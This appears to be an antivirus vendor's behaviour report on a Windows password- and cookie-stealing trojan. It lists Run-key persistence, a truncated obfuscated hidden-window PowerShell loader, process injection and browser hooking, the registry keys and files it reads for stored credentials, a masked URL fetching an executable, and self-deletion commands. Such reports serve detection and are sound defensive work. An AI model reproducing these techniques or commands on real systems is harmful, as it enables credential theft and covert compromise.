Technical Information
To ensure autorun and distribution
Modifies the following registry keys
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'MyApp' = '%APPDATA%\MyApp\MyApp.exe'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run] 'IDRL4XMX' = '%ProgramFiles(x86)%\Bmtfdh\idf8kzixedf8m.exe'
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function vfc4c {param($f33f6)$s3d29='t6d898e';$ka6e9='';for ($i=0; $i -lt $f33f6.length;$i+=2){$r7fd4=[convert]::ToByte($f33f6.Substring($i,2),16);$ka6e9+=[char]($r7fd4 -b...
Injects code into
the following system processes:
- %WINDIR%\explorer.exe
- %WINDIR%\syswow64\svchost.exe
the following user processes:
- lb7ef7f.exe
- iexplore.exe
- firefox.exe
Hooks functions
in browsers
- firefox.exe process, nss3.dll module
- iexplore.exe process, wininet.dll module
Searches for registry branches where third party applications store passwords
- [<HKCU>\Software\RimArts\B2\Settings]
- [<HKCU>\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions]
- [<HKCU>\Software\FTPWare\COREFTP\Sites]
Reads files which store third party applications passwords
- %APPDATA%\thunderbird\profiles.ini
- %LOCALAPPDATA%\google\chrome\user data\default\cookies
Modifies file system
Creates the following files
- %TEMP%\rf4w9h-s.0.cs
- %APPDATA%\l77066ve\l77logrv.ini
- %APPDATA%\l77066ve\l77logri.ini
- %APPDATA%\us2potqz.pac.zip
- %APPDATA%\us2potqz.pac\thunderbird\profiles\wjj9aet2.default\cookies.sqlite
- %APPDATA%\us2potqz.pac\firefox\profiles\gn7ryp3k.default\cookies.sqlite
- %APPDATA%\us2potqz.pac\opera\cookies
- %APPDATA%\us2potqz.pac\chrome\default\cookies
- %LOCALAPPDATA%\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
- %APPDATA%\myapp\myapp.exe
- %TEMP%\bin.exe
- %APPDATA%\lb7ef7f.exe
- %TEMP%\rf4w9h-s.dll
- %TEMP%\res21c5.tmp
- %TEMP%\csc21b4.tmp
- %TEMP%\rf4w9h-s.out
- %TEMP%\rf4w9h-s.cmdline
- %APPDATA%\l77066ve\l77logim.jpeg
- %APPDATA%\l77066ve\l77logrf.ini
Deletes the following files
- %TEMP%\res21c5.tmp
- %TEMP%\csc21b4.tmp
- %TEMP%\rf4w9h-s.out
- %TEMP%\rf4w9h-s.0.cs
- %TEMP%\rf4w9h-s.dll
- %TEMP%\rf4w9h-s.pdb
- %TEMP%\rf4w9h-s.cmdline
- %APPDATA%\lb7ef7f.exe
- %APPDATA%\us2potqz.pac\chrome\default\cookies
- %APPDATA%\us2potqz.pac\firefox\profiles\gn7ryp3k.default\cookies.sqlite
- %APPDATA%\us2potqz.pac\opera\cookies
- %APPDATA%\us2potqz.pac\thunderbird\profiles\wjj9aet2.default\cookies.sqlite
- %APPDATA%\us2potqz.pac.zip
Moves the following files
- from %TEMP%\bin.exe to %TEMP%\tmpg915.tmp
Network activity
TCP
HTTP GET requests
- http://am##ai.org/admin/new_order.exe
- http://ch#####.amazonaws.com/
- http://www.is##bo.com/p9k/?Up############################################################################################
UDP
- DNS ASK am##ai.org
- DNS ASK ch#####.amazonaws.com
- DNS ASK sm##.yandex.com
- DNS ASK is##bo.com
Miscellaneous
Creates and executes the following
- '%APPDATA%\lb7ef7f.exe'
- '%TEMP%\bin.exe'
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\rf4w9h-s.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES21C5.tmp" "%TEMP%\CSC21B4.tmp"' (with hidden window)
Executes the following
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\rf4w9h-s.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES21C5.tmp" "%TEMP%\CSC21B4.tmp"
- '%WINDIR%\syswow64\svchost.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%APPDATA%\lb7ef7f.exe"
- '%ProgramFiles(x86)%\mozilla firefox\firefox.exe'
